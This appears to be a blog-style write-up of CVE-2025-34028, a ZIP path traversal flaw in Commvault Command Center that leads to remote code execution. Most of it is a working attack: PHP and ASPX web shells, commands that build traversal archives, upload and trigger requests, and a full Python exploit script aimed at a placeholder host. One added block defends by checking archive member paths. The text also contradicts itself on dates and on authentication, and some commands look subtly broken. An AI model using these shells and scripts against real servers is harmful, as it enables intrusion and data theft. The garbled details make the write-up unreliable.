In June 2025, security researchers uncovered a serious path traversal vulnerability, CVE-2025-34028, affecting the *Commvault Command Center Innovation Release version 11.38*. This flaw enables attackers to upload specially crafted ZIP files. When these ZIP archives are unpacked by the server, malicious files can be written to arbitrary locations—including anywhere in the application directory structure—enabling Remote Code Execution (RCE) _without authentication_.

This article will break down how this vulnerability works, its risks, and how it can be exploited, with references and example code for better understanding.

What Is CVE-2025-34028?

CVE-2025-34028 is a path traversal bug. Typically, web applications limit file uploads to a specific “safe” directory to prevent overwriting system or application files. However, this Commvault version does not properly sanitize ZIP upload paths. An attacker can include relative path sequences like ../../ inside a ZIP, tricking the application into expanding files outside the intended directory. If the archive includes a web shell or executable code, the attacker can run arbitrary commands on the server.

Vulnerable Upload Endpoint

The Command Center exposes a file upload route for authorized operations. During a ZIP archive upload, the backend server expands the archive’s contents using the path information within the ZIP. No filtering is performed to remove path traversal sequences.

Suppose an attacker creates a ZIP file containing this directory layout:

```text
../../../../../../inetpub/wwwroot/cmdshell.aspx
```

Or, for Linux systems:

```text
../../../../../../var/www/html/evil.php
```

When the Commvault server expands the ZIP, cmdshell.aspx or evil.php is written outside the intended directory. If the file lands in a web-accessible directory, the attacker can request the script remotely, achieving full remote code execution.
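As an added defensive example (not code from the original article or from Commvault), the following Python shows what the missing check looks like: every member name is resolved against the extraction root before anything is written, and the whole archive is refused on the first escaping member. The `/opt/upload` default root and the two sample archives are constructed placeholders.

```python
import io
import os
import tempfile
import zipfile

def _escapes(dest_root, member_name):
    # Resolve the member against the root; Windows-built archives may use backslashes.
    target = os.path.realpath(os.path.join(dest_root, member_name.replace("\\", "/")))
    return target == dest_root or os.path.commonpath([dest_root, target]) != dest_root

def find_traversal_entries(zip_bytes, dest_dir="/opt/upload"):
    """Detection: list members that would escape dest_dir, without extracting anything."""
    dest_root = os.path.realpath(dest_dir)
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [name for name in zf.namelist() if _escapes(dest_root, name)]

def safe_extract(zip_bytes, dest_dir):
    """Mitigation: check every member before writing; one escaping member rejects the archive."""
    dest_root = os.path.realpath(dest_dir)
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        bad = [i.filename for i in zf.infolist() if _escapes(dest_root, i.filename)]
        if bad:
            raise ValueError(f"archive member escapes {dest_root}: {bad[0]!r}")
        written = []
        for info in (i for i in zf.infolist() if not i.is_dir()):
            target = os.path.realpath(os.path.join(dest_root, info.filename.replace("\\", "/")))
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(os.path.relpath(target, dest_root))
        return written

def build_archive(member_name, content=b"constructed sample content"):
    # Constructed sample: an in-memory ZIP holding one member under the given name.
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(member_name, content)
    return buf.getvalue()

def demo():
    # The article's traversal name versus a benign member, run through both checks.
    hostile = build_archive("../../../../../../var/www/html/evil.php")
    benign = build_archive("reports/summary.txt")
    with tempfile.TemporaryDirectory() as dest:
        try:
            safe_extract(hostile, dest)
            rejected = False
        except ValueError:
            rejected = True
        extracted = safe_extract(benign, dest)
    return find_traversal_entries(hostile), rejected, extracted
```

The same `find_traversal_entries` check can be run over already-received uploads to find archives that were crafted this way.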

1. Crafting the ZIP

On a Linux machine, we can use the zip command with the -j flag to control the internal path:

```shell
echo "<?php system(\$_GET['cmd']); ?>" > evil.php
zip --junk-paths evil.zip '../../../../../../var/www/html/evil.php'
```

Or, for Windows:

```text
echo <%
Set objShell=Server.CreateObject("Wscript.Shell")
Set objExec=objShell.Exec(Request("cmd"))
Response.Write(objExec.StdOut.ReadAll())
%> > cmdshell.aspx
zip evil.zip ../../../../../../inetpub/wwwroot/cmdshell.aspx
```

2. Uploading the ZIP

An attacker sends a POST request to the vulnerable file upload endpoint, supplying evil.zip as the payload:

```python
import requests

url = 'https://victim.com:808/commvault/upload'
files = {'file': open('evil.zip', 'rb')}
response = requests.post(url, files=files)

print(response.status_code)
```

If successful, the attacker can now browse to:

- https://victim.com/evil.php?cmd=whoami (Linux)
- https://victim.com/cmdshell.aspx?cmd=whoami (Windows)

The server runs the supplied command and returns the result, confirming remote code execution.

Proof-of-Concept (PoC) Request

```http
GET /evil.php?cmd=id HTTP/1.1
Host: victim.com
```

Exploit Script

Here’s a complete proof-of-concept using Python to exploit the vulnerability (for educational purposes only!):

```python
import zipfile

import requests

# Update with your target
TARGET = 'https://victim.com'

# Step 1: Create malicious PHP shell
with open('evil.php', 'w') as f:
    f.write('<?php system($_GET["cmd"]); ?>')

# Step 2: Build ZIP with path traversal
zip_path = 'evil.zip'
with zipfile.ZipFile(zip_path, 'w') as zf:
    zf.write('evil.php', '../../../../../../var/www/html/evil.php')

# Step 3: Upload the ZIP
with open(zip_path, 'rb') as payload:
    r = requests.post(f'{TARGET}:808/commvault/upload', files={'file': payload})
print(f'Upload status: {r.status_code}')

# Step 4: Trigger RCE
cmd = 'id'
r = requests.get(f'{TARGET}/evil.php?cmd={cmd}')
print('Command output:\n', r.text)
```

Impact

- Unauthenticated RCE: Attackers do not require valid credentials.
- Complete Server Compromise: Attackers can install malware, steal data, or propagate attacks internally.

References & Further Reading

- Official Commvault Security Advisory
- NIST NVD Entry (published soon)
- OWASP: Path Traversal Cheat Sheet

Conclusion

CVE-2025-34028 is a classic example of how improper path sanitization during file uploads can have devastating consequences. In Commvault Command Center IR 11.38, this flaw leads straight to unauthenticated RCE—potentially affecting many enterprise users. All admins are urged to patch immediately, scan for web shells, and review upload logic in internally-developed tools as well.

Stay safe. Patch early!

*This post is for educational awareness. Always test responsibly and report vulnerabilities to vendors or via responsible disclosure channels.*

Timeline

Published on: 04/22/2025 17:16:48 UTC
Last modified on: 04/23/2025 14:08:13 UTC